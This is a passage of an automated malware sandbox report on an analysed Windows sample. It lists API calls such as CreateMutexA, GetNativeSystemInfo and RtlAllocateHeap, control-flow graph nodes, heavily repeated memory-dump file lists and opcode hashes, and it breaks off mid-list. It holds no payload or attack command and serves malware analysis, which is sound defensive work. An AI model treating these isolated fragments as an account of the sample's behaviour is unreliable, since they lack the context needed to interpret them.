                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: ad0a0c2184605c6bdb6b29fda6ae94dc5c18fae0a272187419eb2a3b301f7e44
                                                                                                                                                                                                                                                                • Instruction ID: f105b2991882e786a2ae8e581292eb50033b531b4629166dd27d13ed66190094
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad0a0c2184605c6bdb6b29fda6ae94dc5c18fae0a272187419eb2a3b301f7e44
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC2145317042049BFB0C9B68E8C97AEBB62FBD1316F244319E814D77D0C7769A888253

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 561 857d30-857db2 call 8840f0 565 858356-858373 call 86cff1 561->565 566 857db8-857de0 call 867a00 call 855c10 561->566 573 857de4-857e06 call 867a00 call 855c10 566->573 574 857de2 566->574 579 857e08 573->579 580 857e0a-857e23 573->580 574->573 579->580 583 857e25-857e34 580->583 584 857e54-857e7f 580->584 585 857e36-857e44 583->585 586 857e4a-857e51 call 86d663 583->586 587 857e81-857e90 584->587 588 857eb0-857ed1 584->588 585->586 589 858374 call 886c6a 585->589 586->584 591 857ea6-857ead call 86d663 587->591 592 857e92-857ea0 587->592 593 857ed7-857edc 588->593 594 857ed3-857ed5 GetNativeSystemInfo 588->594 602 858379-85837f call 886c6a 589->602 591->588 592->589 592->591 595 857edd-857ee6 593->595 594->595 600 857f04-857f07 595->600 601 857ee8-857eef 595->601 606 8582f7-8582fa 600->606 607 857f0d-857f16 600->607 604 857ef5-857eff 601->604 605 858351 601->605 609 85834c 604->609 605->565 606->605 612 8582fc-858305 606->612 610 857f29-857f2c 607->610 611 857f18-857f24 607->611 609->605 614 8582d4-8582d6 610->614 615 857f32-857f39 610->615 611->609 616 858307-85830b 612->616 617 85832c-85832f 612->617 618 8582e4-8582e7 614->618 619 8582d8-8582e2 614->619 620 857f3f-857f9b call 867a00 call 855c10 call 867a00 call 855c10 call 855d50 615->620 621 858019-8582bd call 867a00 call 855c10 call 867a00 call 855c10 call 855d50 call 867a00 call 855c10 call 855730 call 867a00 call 855c10 call 867a00 call 855c10 call 855d50 call 867a00 call 855c10 call 855730 call 867a00 call 855c10 call 867a00 call 855c10 call 855d50 call 867a00 call 855c10 call 855730 call 867a00 call 855c10 call 867a00 call 855c10 call 855d50 call 867a00 call 855c10 call 855730 615->621 622 858320-85832a 616->622 623 85830d-858312 616->623 624 858331-85833b 617->624 625 85833d-858349 617->625 618->605 627 8582e9-8582f5 618->627 619->609 646 857fa0-857fa7 620->646 658 8582c3-8582cc 621->658 622->605 623->622 629 858314-85831e 623->629 624->605 625->609 627->609 629->605 648 857fa9 646->648 649 857fab-857fcb call 888bbe 646->649 648->649 655 858002-858004 649->655 656 857fcd-857fdc 649->656 655->658 659 85800a-858014 655->659 661 857ff2-857fff call 86d663 656->661 662 857fde-857fec 656->662 658->606 664 8582ce 658->664 659->658 661->655 662->602 662->661 664->614
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00857ED3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                                                • Opcode ID: 679fff74343752e4d6f286fd983f12ae97be1e48bec2ad8932c9194a753133f2
                                                                                                                                                                                                                                                                • Instruction ID: b0d5d0623e03a14a79c29e5622fbde1e0d5f86a7e525d731a61c7cd96903eb15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 679fff74343752e4d6f286fd983f12ae97be1e48bec2ad8932c9194a753133f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE1F070E006049BDB14BB68CC1B79E7B61FB41725F944298E819EB3C2DB345E888BC3

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 860 88d82f-88d83a 861 88d848-88d84e 860->861 862 88d83c-88d846 860->862 864 88d850-88d851 861->864 865 88d867-88d878 RtlAllocateHeap 861->865 862->861 863 88d87c-88d887 call 8875f6 862->863 869 88d889-88d88b 863->869 864->865 866 88d87a 865->866 867 88d853-88d85a call 889dc0 865->867 866->869 867->863 873 88d85c-88d865 call 888e36 867->873 873->863 873->865
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0088A813,00000001,00000364,00000006,000000FF,?,0088EE3F,?,00000004,00000000,?,?), ref: 0088D871
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 42314b566fba53e21a8e8d6a72ebe798c9c8f876af4a4a278419739ee9f4f9c0
                                                                                                                                                                                                                                                                • Instruction ID: 363a4add43c940b520f743f71b9f4167454dd33c3f6e89502e1656dca17f88ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42314b566fba53e21a8e8d6a72ebe798c9c8f876af4a4a278419739ee9f4f9c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08232645329A6EB217A769C05A6B7759FF857B0B198931ED18EB2C1DA20EC0087E1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,0085DA1D,?,?,?,?), ref: 008587B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
